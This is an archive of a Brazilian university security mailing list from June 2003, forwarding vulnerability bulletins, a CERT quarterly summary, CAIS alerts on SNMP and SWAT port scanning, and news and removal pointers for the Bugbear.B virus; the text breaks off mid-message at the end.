From daniela em ccuec.unicamp.br Tue Jun 3 16:06:24 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 3 Jun 2003 16:06:24 -0300 Subject: [SECURITY-L] Software: Compledge Sentinel Message-ID: <20030603190624.GI1598@ccuec.unicamp.br> ----- Forwarded message from Rubens Queiroz de Almeida ----- From: Rubens Queiroz de Almeida Subject: Compledge Sentinel To: daniela em ccuec.unicamp.br Date: Fri, 30 May 2003 15:24:59 -0300 (BRT) Monitoring distribution announced Compledge Sentinel is a specialist Linux distribution designed for system monitoring and security auditing. Based on the Linux from Scratch project and Slackware, the x86 Sentinel distribution includes the Nagios monitoring tool with the Nagat web interface, the Nessus scanner, and the Snort intrusion detection utility amongst other software. Sentinel is free to download and is available now. http://compledge.com/sentinel/ ----- End forwarded message ----- From daniela em ccuec.unicamp.br Tue Jun 3 17:00:42 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 3 Jun 2003 17:00:42 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20030603200041.GA2479@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 28/05/2003 ---------- REVISED: Microsoft Security Bulletin (MS03-019) Assunto: Flaw in ISAPI Extension for Windows Media Services Could Cause Code Execution (817772). http://www.security.unicamp.br/docs/bugs/2003/05/v81.txt 30/05/2003 ---------- Mandrake Linux Security Update Advisory (MDKSA-2003:063) Assunto: vulnerabilidade de seguranca no pacote apache2. http://www.security.unicamp.br/docs/bugs/2003/05/v82.txt 02/06/2003 ---------- SGI Security Advisory (20030601-01-A) Assunto: Some Network Drivers May Leak Data. http://www.security.unicamp.br/docs/bugs/2003/06/v1.txt 03/06/2003 ---------- OpenPKG Security Advisory (OpenPKG-SA-2003.030) Assunto: vulnerabilidade de seguranca no pacote ghostscript. http://www.security.unicamp.br/docs/bugs/2003/06/v2.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Wed Jun 4 11:10:04 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 4 Jun 2003 11:10:04 -0300 Subject: [SECURITY-L] CERT Summary CS-2003-02 Message-ID: <20030604141004.GB3548@ccuec.unicamp.br> ----- Forwarded message from CERT Advisory ----- From: CERT Advisory Subject: CERT Summary CS-2003-02 To: cert-advisory em cert.org Date: Tue, 3 Jun 2003 15:57:00 -0400 Organization: CERT(R) Coordination Center - +1 412-268-7090 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2003-02 June 3, 2003 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available from: CERT Summaries http://www.cert.org/summaries/ ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in March 2003 (CS-2003-01), we have seen an integer overflow vulnerability within Sun's XDR Library, multiple vulnerabilities in Lotus Notes and Domino Server, a buffer overflow vulnerability in Sendmail, and multiple vulnerabilities within Snort's preprocessors. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. CERT/CC Current Activity http://www.cert.org/current/current_activity.html 1. Integer overflow in Sun RPC XDR library routines An integer overflow vulnerability exists in the xdrmem_getbytes() function distributed as part of the Sun Microsystems XDR library. This overflow may allow a remote attacker to execute arbitrary code on the victim machine. CERT Advisory CA-2003-10: Integer overflow in Sun RPC XDR library routines http://www.cert.org/advisories/CA-2003-10.html Vulnerability Note VU#516825: Integer overflow in Sun RPC XDR library routines http://www.kb.cert.org/vuls/id/516825 2. Multiple Vulnerabilities in Lotus Notes and Domino Multiple vulnerabilities had been reported to affect Lotus Notes clients and Domino servers. Due to the confusion surrounding these vulnerabilities we released an advisory to clairfy the details of the vulnerabilities, the versions affected, and the patches that resolve these issues. CERT Advisory CA-2003-11: Multiple Vulnerabilities in Lotus Notes and Domino http://www.cert.org/advisories/CA-2003-11.html Vulnerability Note VU#206361: Lotus iNotes vulnerable to buffer overflow via PresetFields FolderName field http://www.kb.cert.org/vuls/id/206361 Vulnerability Note VU#355169: Lotus Domino Web Server vulnerable to denial of service via incomplete POST request http://www.kb.cert.org/vuls/id/355169 Vulnerability Note VU#542873: Lotus iNotes vulnerable to buffer overflow via PresetFields s_ViewName field http://www.kb.cert.org/vuls/id/542873 Vulnerability Note VU#772817: Lotus Domino Web Server vulnerable to buffer overflow via non-existent "h_SetReturnURL" parameter with an overly long "Host Header" field http://www.kb.cert.org/vuls/id/772817 Vulnerability Note VU#571297: Lotus Notes and Domino COM Object Control Handler contains buffer overflow http://www.kb.cert.org/vuls/id/571297 Vulnerability Note VU#433489: Lotus Domino Server susceptible to a pre-authentication buffer overflow during Notes http://www.kb.cert.org/vuls/id/433489 Vulnerability Note VU#411489: Lotus Domino Web Retriever contains a buffer overflow vulnerability http://www.kb.cert.org/vuls/id/411489 Vulnerability Note VU#583184: Lotus Domino R5 Server Family contains multiple vulnerabilities in LDAP handling code http://www.kb.cert.org/vuls/id/583184 3. Buffer Overflow in Sendmail There is a remotely exploitable vulnerability in sendmail that could allow an attacker to gain control of a vulnerable sendmail server. Due to a variable type conversion problem, sendmail may not adequately check the length of email address tokens. A specially crafted email message could trigger a stack overflow. CERT Advisory CA-2003-12: Buffer Overflow in Sendmail http://www.cert.org/advisories/CA-2003-12.html Vulnerability Note VU#897604: Sendmail address parsing buffer overflow http://www.kb.cert.org/vuls/id/897604 4. Multiple Vulnerabilities in Snort Preprocessors There are two vulnerabilities in the Snort Intrusion Detection System, each in a separate preprocessor module. Both vulnerabilities allow remote attackers to execute arbitrary code with the privileges of the user running Snort, typically root CERT Advisory CA-2003-13: Multiple Vulnerabilities in Snort Preprocessors http://www.cert.org/advisories/CA-2003-13.html Vulnerability Note VU#139129: Heap overflow in Snort "stream4" preprocessor http://www.kb.cert.org/vuls/id/139129 Vulnerability Note VU#916785: Buffer overflow in Snort RPC preprocessor http://www.kb.cert.org/vuls/id/916785 ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new and updated * Advisories http://www.cert.org/advisories/ * Vulnerability Notes http://www.kb.cert.org/vuls * CERT/CC Statistics http://www.cert.org/stats/cert_stats.html * Training Schedule http:/www.cert.org/training/ ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2003-02.html ______________________________________________________________________ CERT/CC Contact Information Email: cert em cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo em cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright ©2003 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPtz0zmjtSoHZUTs5AQGLYgQAq4zW2wa54HJUPWpho57bLIOlZ2PwwiQ1 NPU2SgRI1HlIHL2N3c+21VJ5IfA2DNpoZKlp0xFUI/oPaitMm+XgyyrFkAeMG23A bXFPchvtsDEQyl9um8C6eSd3gU/XGrNg3tBoBpdvj4WaiRs7/qmkNPPrfo/VB+HP nX2s9pdNJOA= =PnMK -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Wed Jun 4 15:25:57 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 4 Jun 2003 15:25:57 -0300 Subject: [SECURITY-L] CAIS-Alerta: Aumento de atividade na porta 901/tcp Message-ID: <20030604182557.GA3855@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Aumento de atividade na porta 901/tcp To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Wed, 4 Jun 2003 15:02:05 -0300 (BRT) -----BEGIN PGP SIGNED MESSAGE----- Prezados, Nos ultimos dias, o CAIS tem identificado um aumento consideravel de atividade de reconhecimento na porta 901/tcp. O registro e analise de tal atividade foi possivel gracas aos mecanismos de monitoracao de acesso a portas mantido pelo CAIS. Diante desta constatacao, recomenda-se fortemente a analise deste trafego. Neste contexto, e´ importante considerar: (i) quais os servicos formalmente registrados nesta porta e; (ii) verificar se existem virus ou backdoors associados a eles. Apos um levantamento feito pelo CAIS, os servicos usualmente associados a esta porta sao: . realsecure-console (901/tcp) . smpnameres (901/udp/tcp) . samba swat (901/tcp) As fontes recomendadas para verificacao da existencia de virus e backdoors sao: . http://www.seifried.org/security/ports/ . http://www.portsdb.org/ O CAIS nao identificou a existencia de vulnerabilidades associadas aos servicos acima citados e a atividade atual parece estar relacionada com a procura por maquinas Linux com o servico Swat (Samba Web Admin Tool) habilitado e acessivel. No entanto, e´ importante ressaltar que a presenca do servico Swat e´ um indicativo de que a maquina tambem possui o servico Samba, e portanto, constitui-se em uma forma alternativa de identificar sua presenca. Sendo que sao amplamente conhecidas as vulnerabilidades de seguranca associadas a versoes de Samba anteriores a 2.2.8a, o CAIS recomenda fortemente aos administradores que fiquem atentos a atividade analoga `a reportada neste alerta, nas redes sob sua responsabilidade, e solicita que ela seja oportunamente reportada ao CAIS para analise e cruzamento de informacoes. Maiores informacoes sobre as ultimas vulnerabilidades do Samba e sobre o servico Swat podem ser obtidas nas seguintes urls: Samba: . http://www.cve.mitre.org CAN-2003-0085 CAN-2003-0196 CAN-2003-0201 . http://www.rnp.br/cais/alertas/2003/DDI-07042003.html . http://www.samba.org/samba/samba.html Swat: . http://www.samba.org/samba/GUI/ Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPt40M+kli63F4U8VAQFmZgP9E3YzBZmksp8SEMv3KXuGg2rg3oMfdnNO RGbhzA1hqZAF+3IgC96o6QwQUrD/oV1nJZuaje+OF/4teWNdx5GACSMUTGNTyiTK ZexL5HSAsvUGUT+eAWFXjOB7Na1TwTWoCO2lfHu/BKqfd0waF0PflbnVRPj0e8nB TFs8CP5PHQs= =XHvW -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Wed Jun 4 15:39:26 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 4 Jun 2003 15:39:26 -0300 Subject: [SECURITY-L] Boletins de noticias Message-ID: <20030604183925.GA3946@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticia e/ou revistas eletronicas: 02/06/2003 ---------- SANS Critical Vulnerability Analysis Vol 2 No 21 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2003/06/b1.txt SecurityFocus Newsletter #199 Fonte: SecurityFocus.com http://www.security.unicamp.br/docs/informativos/2003/06/b2.txt 04/06/2003 ---------- SANS NewsBites Vol. 5 Num. 22 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2003/06/b3.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Wed Jun 4 16:17:55 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 4 Jun 2003 16:17:55 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20030604191755.GA4028@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 03/06/2003 ---------- CERT Summary CS-2003-02 http://www.security.unicamp.br/docs/bugs/2003/06/v3.txt CAIS-Alerta Assunto: CERT Summary CS-2003-02 http://www.security.unicamp.br/docs/bugs/2003/06/v4.txt Updated: SGI Security Advisory (20021105-02-I) Assunto: Updated SGI Apache Version Available. http://www.security.unicamp.br/docs/bugs/2003/06/v5.txt Immunix Secured OS Security Advisory (IMNX-2003-7+-011-01) Assunto: vulnerabilidade de seguranca no pacote wget. http://www.security.unicamp.br/docs/bugs/2003/06/v8.txt Immunix Secured OS Security Advisory (IMNX-2003-7+-012-01) Assunto: vulnerabilidade de seguranca no pacote file. http://www.security.unicamp.br/docs/bugs/2003/06/v9.txt 04/06/2003 ---------- Microsoft Security Bulletin (MS03-020) Assunto: Cumulative Patch for Internet Explorer (818529). http://www.security.unicamp.br/docs/bugs/2003/06/v6.txt CAIS-Alerta Assunto: Aumento de atividade na porta 901/tcp. http://www.security.unicamp.br/docs/bugs/2003/06/v7.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Thu Jun 5 09:28:27 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 5 Jun 2003 09:28:27 -0300 Subject: [SECURITY-L] Noticias-CAIS: Agencia da UE de combate ao cibercrime pode falhar Message-ID: <20030605122827.GA320@ccuec.unicamp.br> ----- Forwarded message from Jacomo Dimmit Boca Piccolini ----- From: Jacomo Dimmit Boca Piccolini Subject: [S] Noticias-CAIS: Agência da UE de combate ao cibercrime pode falhar To: seguranca em pangeia.com.br Date: Wed, 4 Jun 2003 16:41:11 -0300 (BRT) [fonte:http://informatica.terra.com.br/interna/0,5862,OI110944-EI559,00.html] Agência da UE de combate ao cibercrime pode falhar Os planos para a criação de uma agência européia de combate ao crime cibernético - como vírus de computador e ataques terroristas online - poderão vir por água abaixo por causa da burocracia e do excesso de controle dos governos regionais. A Agência de Segurança de Redes e Informação Européia, que desempenharia um papel importante na organização dos 15 países-membros da UE no combate a ameaças relacionadas à Web, deveria começar a atuar até o final deste ano. Entretanto, os países integrantes do bloco agora afirmam que querem indicar diretamente os membros da diretoria que supervisionará o trabalho da entidade. Eles também pretendem acabar com um comitê que representará o setor privado na agência, disseram autoridades da UE. A Comissão se opõe veementemente a uma revisão da estrutura planejada e agora ameaça retirar a proposta. "Este debate é desnecessário. Estamos diante de ameaças digitais diariamente e não temos os meios de reagir a elas", disse um porta-voz da Comissão. A Comissão Européia, órgão executivo da UE que propôs a criação da agência, defendia um órgão ágil e pequeno formado por 30 pessoas que rapidamente reagissem a ataques de vírus e outros problemas. As autoridades de todo o mundo foram acordadas para os perigos das falhas graves em redes, como as causadas pela praga eletrônica SQL Slammer este ano. Atentados terroristas em potencial também são uma fonte de preocupação depois dos ataques de 11 de setembro. As atribuições da agência incluiriam a coleta de dados de ataques online, avaliações de riscos de segurança e criação de diretrizes de prevenção e combate para os membros da UE. Os Estados-membros do bloco já têm unidades locais que operam em crises -chamadas Equipes de Resposta a Emergências Informáticas -, mas não existe uma coordenação central. A nova agência seria uma resposta a essa necessidade e teria um custo de 24 milhões de euros em cinco anos. Outros 9 milhões de euros seriam somados com a entrada de 10 novos membros na UE em maio de 2004. A UE harmonizou as leis contra o cibercrime, criando pesadas penas de prisão para hackers. ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Jun 5 09:32:25 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 5 Jun 2003 09:32:25 -0300 Subject: [SECURITY-L] CAIS-Alerta: Aumento de atividade na porta 161 - SNMP Message-ID: <20030605123225.GB320@ccuec.unicamp.br> ----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca ----- From: Centro de Atendimento a Incidentes de Seguranca Subject: CAIS-Alerta: Aumento de atividade na porta 161 - SNMP To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br Date: Thu, 5 Jun 2003 09:10:30 -0300 (BRT) -----BEGIN PGP SIGNED MESSAGE----- Prezados, Nas ultimas semanas, o CAIS tem identificado um aumento consideravel de atividade de reconhecimento nas portas 161/tcp e 161/udp. O registro e analise de tal atividade foi possivel gracas aos mecanismos de monitoracao de acesso a portas mantido pelo CAIS. As portas mencionadas sao normalmente utilizadas pelo SNMP, Simple Network Management Protocol, protocolo amplamente usado no gerenciamento de redes TCP/IP. As varreduras nas portas 161 tem resultado na geracao dos seguintes alertas do Snort: . [**] [1:1417:2] SNMP request udp [**] . [**] [1:1418:2] SNMP request tcp [**] . [**] [1:1420:2] SNMP trap tcp [**] . [**] [1:1421:2] SNMP AgentX/tcp request [**] . [**] [1:1411:3] SNMP public access udp [**] . [**] [1:1413:2] SNMP private access udp [**] Durante a analise do CAIS, percebeu-se que estes alertas podem ocorrer isoladamente ou em conjunto, como mostrado acima. Assim tambem, eles podem estar, ou nao, acompanhados do seguinte alerta do Snort: . [**] [1:469:1] ICMP PING NMAP [**] A este respeito, o CAIS gostaria de lembrar das conhecidas e amplamente divulgadas vulnerabilidades de seguranca associadas ao protocolo SNMP. Em particular, ressalta-se as multiplas vulnerabilidades identificadas e anunciadas no inicio do ano de 2002 (veja referencias abaixo). Desde entao, tem se discutido sobre o eventual desenvolvimento de ferramentas capazes de explorar tais problemas. Maiores informacoes sobre as mais recentes vulnerabilidades no protocolo SNMP podem ser obtidas nas seguintes URLs: . CERT Advisory CA-2002-03: Multiple Vulnerabilities In Many Implementations of the Simple Network Management Protocol (SNMP) http://www.cert.org/advisories/CA-2002-03.html . Múltiplas Vulnerabilidades no SNMP http://www.rnp.br/cais/alertas/2002/cais-ALR-13022002.html . Simple Network Management Protocol (SNMP) Vulnerabilities Frequently Asked Questions (FAQ) http://www.cert.org/tech_tips/snmp_faq.html Neste sentido, ressalta-se a importancia na atualizacao e configuracao dos servicos SNMP em razao da sua larga utilizacao em equipamentos estrategicos para a infraestrura de redes (roteadores, switches, etc.) e da possibilidade de serem alvos de um ataque com resultados potencialmente serios. O CAIS propoe ainda que sejam questionadas e avaliadas as reais necessidades de se manter habilitado este servico em alguns sistemas e dispositivos de rede, sem um proposito definido. Caso a necessidade deste servico seja confirmada, recomenda-se fortemente que ele seja devidamente configurado a fim de se restringir o acesso ao mesmo. Por ultimo, o CAIS recomenda fortemente aos administradores que fiquem atentos a atividade analoga `a reportada neste alerta, nas redes sob sua responsabilidade. Atenciosamente, ################################################################ # CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA / RNP # # # # cais em cais.rnp.br http://www.cais.rnp.br # # Tel. 019-37873300 Fax. 019-37873301 # # Chave PGP disponivel em: http://www.cais.rnp.br/cais-pgp.key # ################################################################ -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPt8zPukli63F4U8VAQF4uAQAjCDPsa4qc2kTL2rA6XC/hnr6EGzvFgWy uJIS0VkgipnsKuJBgayOLWDMEvIgl+3u8a7MLYVyiQObazg4+PU2SvNw3WsB9QLr 90WVt6f0o1XEW+vK68a6C6tRmC7jdL6wKS1DYaBFXbekMR/7gc750DCL/WuVMJ9R kYnVV6wOE64= =vMnB -----END PGP SIGNATURE----- ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Jun 5 09:39:58 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 5 Jun 2003 09:39:58 -0300 Subject: [SECURITY-L] Microsoft assina acordos para autenticacao digital Message-ID: <20030605123957.GC320@ccuec.unicamp.br> Microsoft assina acordos para autenticação digital da Reuters, em Seattle (EUA) A maior produtora de software do mundo, Microsoft, fechou dois acordos com fornecedores de serviços de autenticação que vai permitir aos usuários assinarem documentos eletrônicos. Segundo a Microsoft, serão utilizados serviços de segurança e autenticação da fornecedora VeriSign para desenvolver sistemas de redes de computadores mais seguros para grandes corporações. As empresas estão cada vez mais se voltando para a autenticação digital para encontrarem uma maneira de verificar a veracidade de documentos eletrônicos, em vez de lidarem com pilhas de papel que precisam de aprovação oficial. Além da VeriSign, a Microsoft fechou acordo com a AuthentiDate para integrar o serviço de autenticação de documentos dentro do pacote Office. A AuthentiDate afirmou em comunicado que usuários do Word poderão baixar extensões de software que lhes permitirão assinar digitalmente documentos protegidos por lei federal. A empresa é fornecedora do serviço de documentos eletrônicos do Correio dos Estados Unidos, que permite aos usuários verificarem e autenticarem a data e o horário de criação de um documento. Os dois anúncios refletem o desejo da Microsoft em fornecer soluções de segurança para seus clientes, uma iniciativa que é parte do esforço da companhia em tornar seus produtos mais confiáveis. "Melhorar a confiança de nossos produtos e permitir que nossos clientes tenham acesso a todo o potencial de suas tecnologias é prioridade para a Microsoft", disse Scott Charney, estrategista-chefe da iniciativa Trustworthy Computing da companhia. From daniela em ccuec.unicamp.br Thu Jun 5 16:51:47 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 5 Jun 2003 16:51:47 -0300 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20030605195147.GA911@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 04/06/2003 ---------- CAIS-Alerta Assunto: Patch Acumulativo para o Internet Explorer (818529). http://www.security.unicamp.br/docs/bugs/2003/06/v10.txt Immunix Secured OS Security Advisory (IMNX-2003-7+-013-01) Assunto: vulnerabilidade de seguranca no pacote LPRng. http://www.security.unicamp.br/docs/bugs/2003/06/v13.txt 05/06/2003 ---------- CAIS-Alerta Assunto: Aumento de atividade na porta 161 - SNMP. http://www.security.unicamp.br/docs/bugs/2003/06/v11.txt Anúncio de Segurança do Conectiva Linux (CLA-2003:659) Assunto: vulnerabilidade de seguranca no pacote mkbootdisk. http://www.security.unicamp.br/docs/bugs/2003/06/v12.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas Mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Thu Jun 5 13:45:16 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 5 Jun 2003 13:45:16 -0300 Subject: [SECURITY-L] Noticias-CAIS: Novo =?iso-8859-1?q?v=EDrus?= Bugbear.B coloca internet em estado de alerta Message-ID: <20030605164516.GB600@ccuec.unicamp.br> ----- Forwarded message from Jacomo Dimmit Boca Piccolini ----- From: Jacomo Dimmit Boca Piccolini Subject: [SUP-CAIS] Noticias-CAIS: Novo vírus Bugbear.B coloca internet em estado de alerta To: Noticias de Seguranca do CAIS Date: Thu, 5 Jun 2003 13:30:32 -0300 (BRT) http://www1.folha.uol.com.br/folha/informatica/ult124u13106.shtml Novo vírus Bugbear.B coloca internet em estado de alerta da Folha Online Um nova variante do vírus Bugbear está se espalhando rapidamente pela internet. Chamado Bugbear.B, ele é muito complexo porque conta com diferentes formas de disseminação --infecta por e-mail ou pelas redes de troca de arquivos como o Kazaa. A praga ainda instala um programa que dá acesso remoto ao PC pela internet. O Bugbear.B se envia a todos os endereços e-mails encontrados no sistema local. Para tanto, ele procura em arquivos de extensões .dbx, .eml, Inbox, .mbx, .mmf, .nch, .ods, .tbb. e usa como remetente e-mails aleatórios --o que dificulta encontrar o usuário realmente infectado. O vírus também usa palavras e nomes de arquivos contidos no sistema contaminado. Na variante Bugbear.B, as possíveis linhas do campo Assunto da mensagem incluem frases como "Announcement" (Anúncio), "Bad News" (Más notícias), "Click on this" (Clique nisso), "Fantastic" etc. Já o corpo da mensagem varia e pode conter fragmentos de arquivos encontrados na máquina da vítima. Os nomes de anexos também variam, mas podem conter os seguintes nomes: "Card", "Docs", "image", "music", "news", "video", entre outros. As mensagens enviadas visam explorar a vulnerabilidade do cabeçalho MIME do Internet Explorer 5.01 ou 5.5, nos PCs que ainda não tenham instalado o Service Pack 2. A partir daí, o Bugbear.B se copia para a pasta Inicializar usando um nome de arquivo aleatório Sua propagação também é feita através de cópias para a pasta Inicializar de máquinas remotas na rede. Cavalo de Tróia Já o cavalo de Tróia no Bugbear.B, usado para o acesso remoto ao computador da vítima, usa a porta TCP 1080, permitindo ao invasor acessar e controlar o sistema comprometido. O vírus tenta infectar executáveis específicos, que estejam dentro de Arquivos de Programas. No entanto, ele também tenta infectar arquivos como o mplayer.exe, notepad.exe, acrord32.exe, aim.exe, icq.exe, iexplore.exe, kazaa.exe, msnmsgr.exe, entre outros. Todos programas bastante populares, instalados em grande número de PCs em todo o mundo. Finalmente, o Bugbear.B interrompe os processos de programas de segurança que estejam carregados na máquina. Perigosa A nova praga está recebendo atenção especial de empresas de antivírus como a McAfee e Sophos. A McAfee já disponibilizou a vacina (http://vil.nai.com/vil/content/v_100358.htm), e a Sophos (www.sophos.com) até modificou o layout de seu site para torná-lo mais leve. A empresa explica que o site está recebendo um número muito alto de acessos de usuários em busca de informações sobre a nova praga. O vírus surgiu hoje e até a hora em que essa nota foi publicada, os servidores da Folha Online já haviam barrado uma série de tentativas de ataque do Bugbear.B. Assim, vale lembrar a importância de fazer a rápida e frequente atualização dos programas de segurança. ----- End forwarded message ----- From daniela em ccuec.unicamp.br Fri Jun 6 10:55:09 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 6 Jun 2003 10:55:09 -0300 Subject: [SECURITY-L] Remocao do Bugbear Message-ID: <20030606135509.GH1915@ccuec.unicamp.br> ----- Forwarded message from Cristine Hoepers ----- From: Cristine Hoepers Subject: [IRT-L] Remocao do Bugbear To: irt-l em listas.unesp.br Date: Fri, 6 Jun 2003 10:49:16 -0300 Ola', Os problemas com o Bugbear estao sendo sentidos por todos e provavelmente cada grupo ja' adotou algumas medidas para reduzir a taxa de infeccoes. O que tem chegado ate' nos sao questionamentos sobre um passo a passo para a "desinfeccao" de maquinas ja' infectadas. O unico consendo e' que nao e' uma tarefa simples, como escolhar a opcao "remover virus" em um antivirus. Na URL a seguir existe um documento do Grupo de Seguranca da Universidade Stanford, com instrucoes para remocao do virus: Removing W32.Bugbear.B from an Infected Machine http://securecomputing.stanford.edu/alerts/bugbear-removal.html Talvez essa URL possa ajudar os grupos aqui da lista a definir alguns passos a serem repassados para seus usuarios. Tambem e' bem completa a descricao do Bugbear feita pelo pessoal de Stanford: Bugbear Virus Rampaging Through Campus - 5 June 2003 http://securecomputing.stanford.edu/alerts/bugbear.html Abracos, Cristine NIC BR Security Office http://www.nbso.nic.br/ _______________________________________________ irt-l mailing list - irt-l em listas.unesp.br https://listas.unesp.br/mailman/listinfo/irt-l ----- End forwarded message ----- From webmaster em unicamp.br Fri Jun 6 14:12:33 2003 From: webmaster em unicamp.br (Daniela Regina Barbetti) Date: Fri, 06 Jun 2003 14:12:33 -0300 Subject: [SECURITY-L] McAfee AVERT Stinger Message-ID: <3EE0CB81.E39DCAAE@unicamp.br> Pessoal, Recebi essa mensagem e acho que poderá ajudar a remover o virus. Daniela -------------- Próxima Parte ---------- Uma mensagem embutida foi limpa... De: "=?iso-8859-1?Q?Regilberto_F._Gir=E3o?=" Assunto: Fw: McAfee AVERT Stinger Data: Fri, 6 Jun 2003 13:30:15 -0300 Tamanho: 68088 URL: From daniela em ccuec.unicamp.br Fri Jun 6 15:25:49 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 6 Jun 2003 15:25:49 -0300 Subject: [SECURITY-L] Re: McAfee AVERT Stinger Message-ID: <20030606182549.GB2364@ccuec.unicamp.br> Pessoal, Mais uma dica para remover o virus BugBear-B. Daniela ----- Forwarded message from Ricardo Pinheiro ----- From: Ricardo Pinheiro Subject: Re: [SECURITY-L] McAfee AVERT Stinger To: daniela em ccuec.unicamp.br Date: Fri, 06 Jun 2003 15:22:30 -0300 Organization: TRTEC Informatica Galera deem uma olhada no site da f-secure..www.f-secure.com .eles foram bem rápidos para detectar e criar a vacina e roda em linux também ! -- Ricardo Licciardo Pinheiro da Silva Account Manager Departamento Comercial TRTEC Informática Ltda ricardo.pinheiro em trtec.com.br http://www.trtec.com.br Fone/Fax :(19) 3233-4233 ----- End forwarded message ----- From daniela em ccuec.unicamp.br Fri Jun 6 16:41:42 2003 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Fri, 6 Jun 2003 16:41:42 -0300 Subject: [SECURITY-L] Virus Bugbear se torna ameaca de alto risco Message-ID: <20030606194142.GA2643@ccuec.unicamp.br> ----- Forwarded message from Rafael R Obelheiro ----- From: Rafael R Obelheiro Subject: [S] Vírus Bugbear se torna ameaça de alto risco To: seguranca em pangeia.com.br Date: Fri, 6 Jun 2003 15:49:57 -0300 Organization: DAS-UFSC [ Outras 